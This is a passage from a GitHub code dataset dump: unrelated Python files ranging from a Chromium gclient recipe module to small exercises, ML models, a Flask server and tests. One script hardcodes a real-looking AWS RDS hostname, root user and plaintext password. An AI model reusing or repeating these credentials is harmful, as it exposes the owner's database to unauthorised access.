A value\n of None manipulates the module's built-in config (self.c).\n override (bool) - If True, will forcibly set revision and custom_vars\n even if the config already contains values for them.\n \"\"\"\n cfg = gclient_config or self.c\n\n for prop, custom_var in cfg.parent_got_revision_mapping.iteritems():\n val = str(self.m.properties.get(prop, ''))\n # TODO(infra): Fix coverage.\n if val: # pragma: no cover\n # Special case for 'src', inject into solutions[0]\n if custom_var is None:\n # This is not covered because we are deprecating this feature and\n # it is no longer used by the public recipes.\n if cfg.solutions[0].revision is None or override: # pragma: no cover\n cfg.solutions[0].revision = val\n else:\n if custom_var not in cfg.solutions[0].custom_vars or override:\n cfg.solutions[0].custom_vars[custom_var] = val\n\n def checkout(self, gclient_config=None, revert=RevertOnTryserver,\n inject_parent_got_revision=True, extra_sync_flags=None,\n **kwargs):\n \"\"\"Return a step generator function for gclient checkouts.\"\"\"\n cfg = gclient_config or self.c\n assert cfg.complete()\n\n if revert is self.RevertOnTryserver:\n revert = self.m.tryserver.is_tryserver\n\n if inject_parent_got_revision:\n self.inject_parent_got_revision(cfg, override=True)\n\n self('setup', ['config', '--spec', self.config_to_pythonish(cfg)], **kwargs)\n\n sync_step = None\n try:\n sync_step = self.sync(cfg, extra_sync_flags=extra_sync_flags, **kwargs)\n\n cfg_cmds = [\n ('user.name', 'local_bot'),\n ('user.email', 'local_bot@example.com'),\n ]\n for var, val in cfg_cmds:\n name = 'recurse (git config %s)' % var\n self(name, ['recurse', 'git', 'config', var, val], **kwargs)\n finally:\n cwd = kwargs.get('cwd', self.m.path['start_dir'])\n if 'checkout' not in self.m.path:\n self.m.path['checkout'] = cwd.join(\n *cfg.solutions[0].name.split(self.m.path.sep))\n\n return sync_step\n\n def runhooks(self, args=None, name='runhooks', **kwargs):\n args = args or []\n assert isinstance(args, (list, tuple))\n with self.m.context(cwd=(self.m.context.cwd or self.m.path['checkout'])):\n return self(name, ['runhooks'] + list(args), infra_step=False, **kwargs)\n\n @property\n def is_blink_mode(self):\n \"\"\" Indicates wether the caller is to use the Blink config rather than the\n Chromium config. This may happen for one of two reasons:\n 1. The builder is configured to always use TOT Blink. (factory property\n top_of_tree_blink=True)\n 2. A try job comes in that applies to the Blink tree. (patch_project is\n blink)\n \"\"\"\n return (\n self.m.properties.get('top_of_tree_blink') or\n self.m.properties.get('patch_project') == 'blink')\n\n def break_locks(self):\n \"\"\"Remove all index.lock files. If a previous run of git crashed, bot was\n reset, etc... we might end up with leftover index.lock files.\n \"\"\"\n self.m.python.inline(\n 'cleanup index.lock',\n \"\"\"\n import os, sys\n\n build_path = sys.argv[1]\n if os.path.exists(build_path):\n for (path, dir, files) in os.walk(build_path):\n for cur_file in files:\n if cur_file.endswith('index.lock'):\n path_to_file = os.path.join(path, cur_file)\n print 'deleting %s' % path_to_file\n os.remove(path_to_file)\n \"\"\",\n args=[self.m.path['start_dir']],\n infra_step=True,\n )\n\n def calculate_patch_root(self, patch_project, gclient_config=None,\n patch_repo=None):\n \"\"\"Returns path where a patch should be applied to based patch_project.\n\n Maps the patch's repo to a path of directories relative to checkout's root,\n which describe where to place the patch. 
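(For example, a hypothetical repo_path_map entry could map a patch repo to the 'src/third_party/foo' subdirectory.) 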
If no mapping is found for the\n repo url, falls back to trying to find a mapping for the old-style\n \"patch_project\".\n\n For now, considers only first solution (c.solutions[0]), but in theory can\n be extended to all of them.\n\n See patch_projects and repo_path_map solution config property.\n\n Returns:\n Relative path, including solution's root.\n If patch_project is not given or not recognized, it'll be just first\n solution root.\n \"\"\"\n cfg = gclient_config or self.c\n root, _ = cfg.repo_path_map.get(patch_repo, ('', ''))\n if not root:\n root, _ = cfg.patch_projects.get(patch_project, ('', ''))\n if not root:\n # Failure case - assume patch is for first solution, as this is what most\n # projects rely on.\n return cfg.solutions[0].name\n # Note, that c.patch_projects contains patch roots as\n # slash(/)-separated path, which are roots of the respective project repos\n # and include actual solution name in them.\n return self.m.path.join(*root.split('/'))\n\n def set_patch_project_revision(self, patch_project, gclient_config=None):\n \"\"\"Updates config revision corresponding to patch_project.\n\n Useful for bot_update only, as this is the only consumer of gclient's config\n revision map. This doesn't overwrite the revision if it was already set.\n \"\"\"\n assert patch_project is None or isinstance(patch_project, basestring)\n cfg = gclient_config or self.c\n path, revision = cfg.patch_projects.get(patch_project, (None, None))\n if path and revision and path not in cfg.revisions:\n cfg.revisions[path] = revision\n","repo_name":"kiwibrowser/src","sub_path":"third_party/depot_tools/recipes/recipe_modules/gclient/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"72431725604","text":"# scope = The region that a variable is recognized\n# A variable is only available from inside the region it is created.\n# A global and locally scoped versions of a variable can be created\n# LEBG => L = local > E = enclosing > G = global > B = Built-in\n\nname = \"Marcos\" # global scope (available inside & outside this function)\n\n\ndef display_name():\n name = \"Ben-hur\" # local scope (available only inside this function)\n print(name)\n\n\ndisplay_name()\nprint(name)\n","repo_name":"MarcosBenHurSilva/ProjetosPython","sub_path":"variable_scope.py","file_name":"variable_scope.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42431830035","text":"#Para tributar un determinado impuesto se debe ser mayor de 16 años y tener unos ingresos \n#iguales o superiores a 1000 € mensuales. 
Escribir un programa que pregunte \n#al usuario su edad y sus ingresos mensuales y muestre por pantalla si el usuario tiene que tributar o no.\nprint(\"Pagos tributarios\")\nage = int(input(\"Ingrese su edad:\"))\nincome = float(input(\"Especifique sus ingresos mensuales:\"))\nif age >= 16:\n if income >= 1000:\n print(\"Usted debe de presentar su pago tributario.\")\n else:\n print(\"Usted no debe presentar pago tributario.\")\nelse:\n print(\"Usted no debe presentar pago tributario.\")","repo_name":"MauricioMunguia10/EjerciciosPython","sub_path":"Condicionales/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72769351526","text":"branco = \" \"\nvelha = [[' ' if numero % 2 == 0 else ' ' for numero in range(\n 1, 4)] for valor in range(1, 4)]\ntoken = [\"X\", \"O\"]\n\n\ndef criarBoard():\n return velha\n\n\ndef printBoard(board):\n for i in range(3):\n print('|'.join(board[i]))\n if(i < 2):\n print('------')\n print()\n\n\ndef getInputValido(mensagem):\n try:\n n = int(input(mensagem))\n if n >= 1 and n <= 3:\n return n - 1\n else:\n print(\"Numero precisa estar entre 1 e 3\")\n return getInputValido(mensagem)\n except:\n print('Número inválido')\n return getInputValido(mensagem)\n\ndef verificaMovimento(board, linha , coluna):\n if(board[linha][coluna] == branco):\n return True\n else:\n return False\n\ndef fazMovimento(board, linha, coluna, jogador):\n board[linha][coluna] = token[jogador]\n\n\ndef verificarGanhador(board):\n # Linha\n for linha in range(3):\n if board[linha][0] == board[linha][1] and board[linha][1] == board[linha][2] and board[linha][0] != branco:\n return board[linha][0]\n # Coluna\n for coluna in range(3):\n if board[0][coluna] == board[1][coluna] and board[1][coluna] == board[2][coluna] and board[0][coluna] != branco:\n return board[0][coluna]\n\n # Diagonal Principal\n if board[0][0] != branco and board[0][0] == board[1][1] and board[1][1] == board[2][2]:\n return board[0][0]\n\n # Diagonal Secundária\n if board[0][2] != branco and board[0][2] == board[1][1] and board[1][1] == board[2][0]:\n return board[0][2]\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == branco:\n return False\n return 'Empatou'","repo_name":"ldsleticia/jogo_da_velha","sub_path":"jogo_da_velha.py","file_name":"jogo_da_velha.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7858300887","text":"# Multi Year Grabber\n# May 2022\n# Elliot Fisk\n# ---------------\n# gets years from the raw tablet data\n\nimport os\nimport psutil\nimport multiprocessing as mp\nfrom Database.SQLfuncs import SQLfuncs\nimport re\n\ndef thread_function(path, tablets, cpu, progress):\n progress[cpu - 1] = 0\n db = SQLfuncs('sumerian-social-network.clzdkdgg3zul.us-west-2.rds.amazonaws.com', 'root', '2b928S#%')\n for tabid in tablets:\n progress[cpu - 1] += 1\n tab = open(path + tabid, 'r', encoding='utf-8')\n current_line = tab.readline()\n\n buf = \"mu \"\n while current_line != '':\n if current_line.find(\"[year]\") != -1:\n current_line = tab.readline()\n end = False\n while current_line != '' and not end:\n buf += re.split(' |\\t', current_line)[1]\n buf += ' '\n end = (-1 != current_line.find(\"\\tV\") and -1 == current_line.find('us2-sa'))\n current_line = tab.readline()\n db.execute_insert(f'insert into rawyearsfixed values (\\\"{buf}\\\", 
\\\"{tabid[0:7]}\\\");')\n buf = \"mu \"\n else:\n current_line = tab.readline()\n\npath = os.getcwd() + '/Dataset/Translated/'\n\nif __name__ == '__main__':\n n_cpus = psutil.cpu_count()\n procs = list()\n progress = mp.Array('i', range(n_cpus))\n tablets = os.listdir(path)\n num_tablets = len(tablets)\n thread_size = int(num_tablets/n_cpus)\n pos = 0\n for cpu in range(n_cpus - 1):\n proc = mp.Process(target=thread_function, args=(path, tablets[pos:(pos + thread_size - 1)], cpu, progress,))\n print(\"started new thread on tablets[%d,%d]\" % (pos, (pos + thread_size - 1)))\n procs.append(proc)\n pos += thread_size\n proc = mp.Process(target=thread_function, args=(path, tablets[pos:(num_tablets - 1)], n_cpus, progress,))\n procs.append(proc)\n\n for p in procs:\n p.start()\n\n sum = 0\n while sum < num_tablets:\n sum = 0\n for i in range(n_cpus):\n sum += progress[i]\n print(\"%d/%d\" % (sum, num_tablets), end='\\r')\n\n for p in procs:\n p.join()","repo_name":"NicholasJUhlhorn/Sumerian-Social-Network-Project","sub_path":"Python/Core/DataCollection/multiYearGrabber.py","file_name":"multiYearGrabber.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9106816061","text":"class Candle:\n\n def __init__(self, t: int, o: float, h: float, l: float, c: float, v: float) -> None:\n self.t = t # in secs of the start of teh duration\n self.h = h\n self.l = l\n self.o = o\n self.c = c\n self.v = v\n\n def __repr__(self) -> str:\n return str([self.t, self.o, self.h, self.l, self.c, self.v])\n","repo_name":"iamarya/strategy-runner","sub_path":"src/models/candle.py","file_name":"candle.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42330242190","text":"#!/usr/bin/env python3\nfrom .models import equipment\nfrom django import forms\n\n\nclass equipmentForm(forms.ModelForm):\n\n class Meta:\n bu = [('KIU', 'KIU'), ('SIU', 'SIU'), ('AGU', 'AGU'), ('NAU', 'NAU'), ('ADU', 'ADU')]\n bl = [('SWT', 'SWT'), ('SLS', 'SLS'), ('WHM', 'WHM'), ('DST', 'DST')]\n model = equipment\n fields = '__all__'\n widgets = {\n 'description': forms.Textarea(attrs={'rows': 2}),\n 'BU': forms.Select(choices=bu),\n 'BL': forms.Select(choices=bl),\n }\n","repo_name":"wcqrwtqr/Equipment-History-tracker","sub_path":"equipmentTraker2/equipment/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7803825880","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n # ITERATIVE\n result = ListNode()\n result_pointer = result\n while list1 and list2:\n if list1.val >= list2.val:\n result_pointer.next = ListNode(val=list2.val)\n list2 = list2.next\n result_pointer = result_pointer.next\n else:\n result_pointer.next = ListNode(val=list1.val)\n list1 = list1.next\n result_pointer = result_pointer.next\n if list1:\n result_pointer.next = list1\n elif list2:\n result_pointer.next = list2\n return result.next\n \n \n # # RECURSIVE\n # if list1 is None and list2 is None:\n # return None\n # elif list1 is None and list2:\n # return list2\n # elif list1 and list2 is None:\n # return list1\n # else:\n # if 
list1.val >= list2.val:\n # return ListNode(list2.val, self.mergeTwoLists(list1, list2.next))\n # else:\n # return ListNode(list1.val, self.mergeTwoLists(list1.next, list2))\n","repo_name":"james950417/leetcode_py3","sub_path":"0021_merge_two_sorted_lists.py","file_name":"0021_merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13156164427","text":"import re\n\nfrom Appearence import Appearance\n\n\nclass InvertedIndex:\n def __init__(self, db, letter_case):\n self.index = dict()\n self.db = db\n self.letter_case = letter_case\n\n def __repr__(self):\n return str(self.index)\n\n def index_document(self, document):\n clean_text = re.sub(r'[^\\w\\s]', '', document['text']).replace('\\n', ' ')\n if not self.letter_case:\n clean_text = clean_text.lower()\n terms = re.split(' ', clean_text)\n appearances_dict = dict()\n for term in terms:\n term_frequency = appearances_dict[term].frequency if term in appearances_dict else 0\n appearances_dict[term] = Appearance(document['id'], term_frequency + 1, document['name'])\n update_dict = {key: [appearance] if key not in self.index else self.index[key] + [appearance]\n for (key, appearance) in appearances_dict.items()}\n self.index.update(update_dict)\n self.db.add(document)\n return document\n\n def lookup_query(self, query):\n return {term: self.index[term] for term in query.split(' ') if term in self.index}\n\n def create_inverted_index(self, documents):\n id = 0\n for document in documents:\n document = {'id': id, 'name': document, 'text': open(document).read()}\n self.index_document(document)\n id += 1\n","repo_name":"Karina5005/QuotesOriginality","sub_path":"src/InvertedIndex.py","file_name":"InvertedIndex.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3129168003","text":"import random\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nrandom.seed(6168850734)\n\nMold = [{\"Offset\":-2.5,\"Variation\":0.625,\"Data\":[]},\n {\"Offset\":0,\"Variation\":0.313,\"Data\":[]}]\n\nOperators = [{\"Name\":\"Andy\",\"Offset\":3.0,\"Variation\":1.25,\"Data\":[]},\n {\"Name\":\"Susan\",\"Offset\":1.25,\"Variation\":0.125,\"Data\":[]},\n {\"Name\":\"Brian\",\"Offset\":-5.5,\"Variation\":0.45,\"Data\":[]}]\n\nWeibull_factor = [{\"Name\":\"Glass fill\",\"Scale\":1,\"Shape\":1,\"Data\":[]}]\n\nParts = []\n\nreplicates = 20\nops = int(len(Operators))\ncavities = int(len(Mold))\nfactors = int(len(Weibull_factor))\nn = ops*cavities*replicates\n\nfor i in range(n):\n op_data = random.normalvariate(Operators[i%ops][\"Offset\"],\n Operators[i%ops][\"Variation\"])\n Operators[i%ops][\"Data\"].append(op_data)\n\n cavity_data = random.normalvariate(Mold[i%cavities][\"Offset\"],\n Mold[i%cavities][\"Variation\"]) \n Mold[i%cavities][\"Data\"].append(cavity_data)\n\n weibull_data = random.weibullvariate(Weibull_factor[i%factors][\"Scale\"],\n Weibull_factor[i%factors][\"Shape\"])\n Weibull_factor[i%factors][\"Data\"].append(weibull_data)\n\n part_data = op_data + cavity_data + weibull_data\n Parts.append({\"Operator\":i%ops,\n \"Cavity\":i%cavities,\n \"Weibull factor\":i%factors,\n \"Data\":part_data})\n\ndf = pd.DataFrame.from_dict(Parts)\ndf.to_csv('Data.csv')\n# 
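left disabled; uncomment to dump the raw simulated part records:\n# 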
print(Parts)\n","repo_name":"gmclapp/Personal_library","sub_path":"Normality_demonstrator.py","file_name":"Normality_demonstrator.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10437042489","text":"from flask import Flask, request, jsonify\nfrom symptom_checker import SymptomChecker\nimport requests\nimport sqlite3 as sql\nimport base64\nimport json\n\napp = Flask(__name__)\ndb = \"database/db.sqlite\"\n\ndiag_checker = SymptomChecker()\ndiag_checker.train_model()\n\n@app.route('/diagnostic', methods=['POST'])\ndef diagnostic():\n try:\n ids = request.get_json()[\"ids\"]\n diagnostic = diag_checker.ml_diagnostic(ids)[0]\n response = {\"diagnostic\": diag_checker.id_to_diag(diagnostic)}\n return jsonify(response)\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n@app.route('/register', methods=['POST'])\ndef register():\n try:\n data = request.get_json()\n role = data[\"role\"]\n id = data[\"identifier\"]\n\n response = {\"alerts\": []}\n\n if role == \"ROLE_DOCTOR\":\n with sql.connect(db) as con:\n con.row_factory = sql.Row\n cursor = con.cursor()\n\n # remove all old alerts\n cursor.execute(\"DELETE FROM alerts WHERE (JulianDay() - JulianDay(alert_time)) * 24 * 60 >= 15\")\n\n cursor.execute(\"SELECT * FROM doctors WHERE identifier = ?\", (id,))\n if cursor.fetchone() == None:\n cursor.execute(\"INSERT INTO doctors (identifier) VALUES (?)\", (id,))\n\n cursor.execute(\"SELECT * FROM doctors WHERE identifier = ?\", (id,))\n doctor = cursor.fetchone()\n cursor.execute(\"SELECT location FROM alerts WHERE alert_time > ?\", (doctor[\"last_updated\"],))\n alerts = cursor.fetchall()\n for alert in alerts:\n response[\"alerts\"].append(alert[\"location\"])\n\n\n cursor.execute(\"UPDATE doctors SET last_updated = CURRENT_TIMESTAMP WHERE identifier = ?\", (id,))\n con.commit()\n return jsonify(response)\n return jsonify({\"error\": \"Invalid request\"}) # yuk, ugly code\n return jsonify(response)\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n\n@app.route('/alert', methods=['POST'])\ndef alert():\n try:\n location = request.get_json()[\"location\"]\n with sql.connect(db) as con:\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute(\"INSERT INTO alerts (location) VALUES(?)\", (location,))\n return jsonify({\"status\": \"RECEIVED\"})\n return jsonify({\"error\": \"Error happened.\"})\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","repo_name":"apomalyn/MissionHack-applicationMobile","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8389707788","text":"# some varialbles\nlogi_mouse_sensi = -0.6 # needs to me between -1 and 1\n\n#########\n\nimport os\n\n\ndef ls_system():\n os.system(\"ls\")\n\ndef is_screen_connected(ID):\n stream = os.popen(f'xrandr | grep {ID}')\n output = stream.read()\n return \" connected\" in output\n\ndef is_usb_connected(name):\n stream = os.popen(f'lsusb | grep \"{name}\"')\n output = stream.read()\n s = name in output\n if s: print(f\"{name}: connected\")\n else: print(f\"{name}: not connected\")\n return s\n\ndef run_app(app):\n stream = os.popen(f\"pgrep {app}\")\n output = stream.read()\n s = len(output)>1\n if s: print(f\"{app}: already running\")\n else:\n 
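# not running yet: start the app in the background via the shell\n 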
os.system(f\"{app} &\")\n print(f\"{app}: now set to run\")\n\n\n# check screen connection\nif is_screen_connected(\"HDMI-0\") and is_screen_connected(\"DP-0\"):\n os.system(\"xrandr --output DP-0 --right-of HDMI-0\")\n print(\"Dual monitor: DP-0 set to the right of HDMI-0\")\n\nif is_screen_connected(\"HDMI-0\"):\n os.system(\"xrandr --output HDMI-0 --mode 1920x1080 --rate 74\")\n print(\"HDMI-0: resolution and rate set\")\nelse: print(\"HDMI-0: not connected\")\n\nif is_screen_connected(\"DP-0\"):\n os.system(\"xrandr --output DP-0 --mode 2560x1080 --rate 200\")\n print(\"DP-0: resolution and rate set\")\nelse: print(\"DP-0: not connected\")\n\n\n# special case for Logitech mouse\nmouse_status = False\nif is_usb_connected(\"Logitech, Inc. USB Receiver\"):\n os.system(f'xinput --set-prop \"Logitech USB Receiver\" \"libinput Accel Speed\" {logi_mouse_sensi}')\n mouse_status = True\nif is_usb_connected(\"Logitech, Inc. PRO X Wireless\"):\n os.system(f'xinput --set-prop \"Logitech PRO X Wireless\" \"libinput Accel Speed\" {logi_mouse_sensi}')\n mouse_status = True\n\nif mouse_status:\n print(f\"Logitech mouse sensivity set to {logi_mouse_sensi}\")\n\n\n\nrun_app(\"redshift-gtk\")\nrun_app(\"autotiling\")\nrun_app(\"megasync\")\n","repo_name":"clement3872/dotefiles","sub_path":"scripts/startup/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11213449204","text":"import torch\nimport torch.nn as nn\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n\n def forward(self, x):\n return self.fn(x) + x\n\n\nclass ConvMixer(nn.Module):\n def __init__(self, dim, depth, kernel_size=9, patch_size=16, n_classes=1000):\n super().__init__()\n self.patch_embed = nn.Sequential(\n nn.Conv2d(3, dim, kernel_size=patch_size, stride=patch_size),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n )\n self.conv_mixer_blocks = nn.ModuleList([nn.Sequential(\n # Depthwise Convolution\n Residual(nn.Sequential(\n nn.Conv2d(dim, dim, kernel_size, groups=dim, padding=\"same\"),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n )),\n # Pointwise Convolution\n nn.Conv2d(dim, dim, kernel_size=1),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n ) for _ in range(depth)])\n self.projection = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Flatten(),\n nn.Linear(dim, n_classes)\n )\n\n def forward(self, x):\n x = self.patch_embed(x)\n for blk in self.conv_mixer_blocks:\n x = blk(x)\n\n x = self.projection(x)\n\n return x\n \n\nif __name__ == '__main__':\n x = torch.rand(32, 3, 128, 128)\n model = ConvMixer(512, 3)\n y = model(x)\n print(y.shape)\n ","repo_name":"plumprc/Toy-code-python","sub_path":"Models/convmixer.py","file_name":"convmixer.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17883575815","text":"import cv2\r\nimport os\r\nfrom PIL import Image, ImageFilter\r\ndef video(who, bot, message):\r\n cam = cv2.VideoCapture(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/video.mp4\")\r\n try:\r\n if not os.path.exists(os.getcwd().replace(\"\\\\\", \"/\") + '/' + str(who) + '/data'):\r\n os.makedirs(os.getcwd().replace(\"\\\\\", \"/\") + '/' + str(who) + '/data')\r\n except OSError:\r\n print('Error: Creating directory of data')\r\n # frame\r\n currentframe = 0\r\n frames = 0\r\n while (True):\r\n ret, frame = cam.read()\r\n if ret:\r\n if currentframe % 1 == 
0:\r\n name = \"./\" + str(who) + '/data/' + str(frames) + \".jpg\"\r\n cv2.imwrite(name, frame)\r\n i = Image.open(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/data/\" + str(frames) + \".jpg\")\r\n i = i.filter(ImageFilter.SHARPEN)\r\n i = i.resize((128, 128))\r\n i = i.filter(ImageFilter.SHARPEN)\r\n picture_x, picture_y = i.size\r\n for a in range(picture_x):\r\n for b in range(picture_y):\r\n s, d, f = i.getpixel((a, b))\r\n if s <= 128:\r\n s = 0\r\n else:\r\n s = 255\r\n if d <= 128:\r\n d = 0\r\n else:\r\n d = 255\r\n if f <= 128:\r\n f = 0\r\n else:\r\n f = 255\r\n i.putpixel((a, b), (s, d, f))\r\n i = i.transpose(Image.ROTATE_180)\r\n i.save(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/data/\" + str(frames) + \".jpg\")\r\n frames += 1\r\n currentframe += 1\r\n else:\r\n bot.send_message(message.chat.id, \"Your video has loaded successfully\")\r\n return frames\r\n break\r\n cam.release()\r\n cv2.destroyAllWindows()","repo_name":"Andrey17009/McpiMapScreen","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12963178453","text":"from numpy import float32, ones\nfrom pytest import mark\n\nfrom deepdoctection.datapoint.annotation import CategoryAnnotation, ImageAnnotation\nfrom deepdoctection.datapoint.box import BoundingBox\nfrom deepdoctection.datapoint.image import Image\nfrom deepdoctection.datapoint.view import Page\nfrom deepdoctection.utils.settings import LayoutType, Relationships\n\nfrom ..test_utils import get_test_path\nfrom .conftest import WhiteImage\n\n\n@mark.basic\ndef test_page_from_image(dp_image_with_layout_and_word_annotations: Image) -> None:\n \"\"\"\n test page gets converted from an image correctly\n \"\"\"\n # Arrange\n dp_image = dp_image_with_layout_and_word_annotations\n title_ann = dp_image.get_annotation(category_names=[\"title\"])[0]\n title_ann.dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n text_ann = dp_image.get_annotation(category_names=[\"text\"])[0]\n text_ann.dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n\n word_anns = dp_image.get_annotation(category_names=\"word\")\n\n word_anns[0].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n word_anns[1].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n word_anns[2].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n word_anns[3].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n\n # Act\n page = Page.from_image(\n dp_image,\n LayoutType.word,\n [LayoutType.text, LayoutType.title, LayoutType.list],\n )\n\n # Assert\n assert page.text == \"hello world\\nbye world\\n\"\n\n\n@mark.basic\ndef test_image_with_anns_can_be_saved(image: WhiteImage) -> None:\n \"\"\"\n test save does not raise any exception\n \"\"\"\n\n # Arrange\n test_image = Image(location=image.loc, file_name=image.file_name)\n test_image.image = ones((24, 85, 3), dtype=float32)\n cat_1 = ImageAnnotation(\n category_name=\"table\",\n 
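# absolute pixel coordinates on the 24x85 white test image\n 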
bounding_box=BoundingBox(ulx=15.0, uly=20.0, width=10.0, height=8.0, absolute_coords=True),\n )\n test_image.dump(cat_1)\n\n # Act\n page = Page.from_image(test_image, LayoutType.table, [LayoutType.table])\n\n try:\n page.save(dry=True)\n except Exception as exception: # pylint: disable=W0703\n assert False, f\"{exception}\"\n\n\n@mark.basic\ndef test_load_page_from_file() -> None:\n \"\"\"\n test class from_file returns a page\n \"\"\"\n test_file_path = get_test_path() / \"test_image.json\"\n image = Page.from_file(test_file_path.as_posix())\n assert isinstance(image, Page)\n","repo_name":"deepdoctection/deepdoctection","sub_path":"tests/datapoint/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":1814,"dataset":"github-code","pt":"52"} +{"seq_id":"41955500801","text":"from yapsy.IPlugin import IPlugin\nimport logging\nfrom ConfigParser import SafeConfigParser\n\nclass IRCPlugin(IPlugin):\n\n def __init__(self):\n \"\"\"\n Args:\n synchronous: If the plugin can be executed without blocking, syncrhonous can be set to true, to speed up execution. Please use with care.\n \"\"\"\n self.synchronous = False\n\n def get_configuration(self, config_file_string, attribute_dict_list = [{}]):\n \"\"\"\n Gets the configuration from a config file.\n\n Args:\n config_file_string: the string of the file to configure\n attribute_dict_list: a list of dictionaries with keys \"section\" and \"conf\" with the section of\n the conf file and the value of it.\n\n Returns: a dictionary with keys as attribute_dict_list's \"conf\"s.\n \"\"\"\n\n conf_results = {}\n\n try:\n parser = SafeConfigParser()\n parser.read(config_file_string)\n\n for di in attribute_dict_list:\n conf_results[di[\"conf\"]] = parser.get(di[\"section\"], di[\"conf\"])\n\n except Exception as e:\n logging.error(\"Error when parsing plugin info.\", exc_info=e)\n\n return conf_results\n","repo_name":"tian2992/tio_chema","sub_path":"plugins/ircplugin.py","file_name":"ircplugin.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"36638551887","text":"import asyncio\nimport logging\nimport time\nimport urllib.request\nfrom multiprocessing.dummy import Pool\n\nlog = logging.getLogger('perfomance_test')\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nURLS = [\n 'http://weather.com',\n 'http://google.com',\n 'http://yandex.ru',\n 'http://wikipedia.org',\n 'http://habrahabr.ru',\n 'http://ostrovok.org',\n 'http://booking.com',\n 'http://www.kaggle.com',\n 'http://www.habr.com',\n 'http://www.gitlab.com',\n 'http://www.github.com',\n]\n\n\ndef sync():\n start = time.time()\n for i, result in enumerate([\n urllib.request.urlopen(url)\n for url in URLS\n ]):\n pass\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Sync execution took {time.time()-start:.2f}')\n\n\ndef sync_threading():\n start = time.time()\n with Pool() as pool:\n results = pool.map(lambda url: urllib.request.urlopen(url), URLS)\n for i, result in enumerate(results):\n pass\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Sync execution with threading took {time.time()-start:.2f}')\n\n\nasync def main():\n start = time.time()\n loop = asyncio.get_event_loop()\n futures = [\n loop.run_in_executor(\n None,\n urllib.request.urlopen,\n url\n 
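# None selects the loop's default ThreadPoolExecutor\n 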
